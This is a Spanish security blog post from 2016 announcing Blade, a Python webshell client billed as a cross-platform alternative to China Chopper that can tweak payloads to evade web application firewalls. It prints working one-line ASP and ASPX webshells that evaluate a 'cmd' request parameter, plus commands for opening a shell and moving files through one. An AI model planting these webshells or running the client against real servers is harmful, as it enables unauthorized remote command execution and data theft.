Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
▼
enero
(Total:
19
)
- Supuestos Archivos PDF y protectores de pantalla r...
- Blade: una nueva webshell ASP, PHP y JSP
- Malwarebytes presenta un Anti-Ransomware beta
- Antivirus LiveCD 16.0-0.99 con el motor antivirus ...
- Un hospital de Melbourne paralizado por un virus p...
- Skype por fín oculta tu dirección IP real
- Página web Crashsafari que hace colgar tu iPhone o...
- Xiaomi M5: precio y características ya filtradas
- WhatsApp anuncia que será gratis para siempre
- El ransomware CryptoJoker no es cosa de risa
- CES 2016: las novedades tecnológicas para este año
- Se gasta 7.000 euros jugando al FIFA en la Xbox
- ¿Cómo programar en C en 2016?
- Es oficial: Internet Explorer 8, 9 y 10 se quedará...
- BlackBerry abandonará definitivamente su sistema o...
- Oculus Rift ya disponible para reserva por 699 euros
- Intel actualiza su Computer Stick con procesadores...
- Microsoft avisará a los usuarios ante accesos no a...
- Samsung presenta un SSD portable con USB Type-C y ...
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
395
)
privacidad
(
363
)
google
(
353
)
ransomware
(
338
)
vulnerabilidad
(
301
)
Malware
(
263
)
Windows
(
243
)
android
(
242
)
cve
(
235
)
tutorial
(
235
)
manual
(
220
)
software
(
201
)
hardware
(
193
)
linux
(
124
)
twitter
(
115
)
ddos
(
94
)
WhatsApp
(
90
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
67
)
app
(
65
)
Networking
(
56
)
nvidia
(
52
)
ssd
(
51
)
youtube
(
50
)
adobe
(
43
)
firmware
(
42
)
office
(
41
)
hack
(
40
)
firefox
(
35
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
MAC
(
25
)
apache
(
25
)
programación
(
25
)
exploit
(
23
)
javascript
(
22
)
multimedia
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
Pese a que Gemini ofrece multitudes de opciones, recientemente, se ha dado a conocer una situación fuera de lo común. Hace unos días, un es...
-
La seguridad en dispositivos móviles es cada vez más crucial, especialmente ante el crecimiento de aplicaciones maliciosas diseñadas para v...
Blade: una nueva webshell ASP, PHP y JSP
sábado, 30 de enero de 2016
|
Publicado por
el-brujo
|
Editar entrada
Blade es una herramienta de conexión a webshell basado en consola, actualmente en fase de desarrollo que pretende ser una alternativa al chino Chooper.
¿Por qué? Pues porque Chooper es un cliente Webshell genial, que soporta muchos scripts del lado del servidor, pero sólo puede trabajar en Windows. De ahí la motivación de crear otro "Chooper" pero multiplataforma: compatible con Windows, Linux y Mac OS X.
Blade se basa en Python por lo que permite a los usuarios modificar los payloads de conexión del Webshell de manera que puede evadir algunos WAF que Chooper no puede. Sus funciones principales son:
Obtener una shell:
Subir un archivo:
Fuentes:
http://www.hackplayers.com/2016/01/blade-un-webshell-en-python-para-evadir-waf.html
¿Por qué? Pues porque Chooper es un cliente Webshell genial, que soporta muchos scripts del lado del servidor, pero sólo puede trabajar en Windows. De ahí la motivación de crear otro "Chooper" pero multiplataforma: compatible con Windows, Linux y Mac OS X.
Blade se basa en Python por lo que permite a los usuarios modificar los payloads de conexión del Webshell de manera que puede evadir algunos WAF que Chooper no puede. Sus funciones principales son:
- Administra un servidor web con una sóla línea de código:
- Compatible con PHP, ASP, ASPX y JSP
- Proporciona una consola de terminal
- Gestión de archivos y base de datos
PHP: ASP: <%eval request("cmd")%> ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
Obtener una shell:
python blade.py -u http: //localhost/shell.php -s php -p cmd --shell
Descargar un archivo:python blade.py -u http: //localhost/shell.php -s php -p cmd --pull REMOTE_PATH local_path
Subir un archivo:
python blade.py -u http: //localhost/shell.php -s php -p cmd --push local_path REMOTE_PATH
Actualmente sólo está desarrollado el soporte PHP y ASP y todavía no
está implementada completamente la gestión de base de datos pero, si
continúa su desarrollo, puede resultar un Webshell más que interesante:Fuentes:
http://www.hackplayers.com/2016/01/blade-un-webshell-en-python-para-evadir-waf.html
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.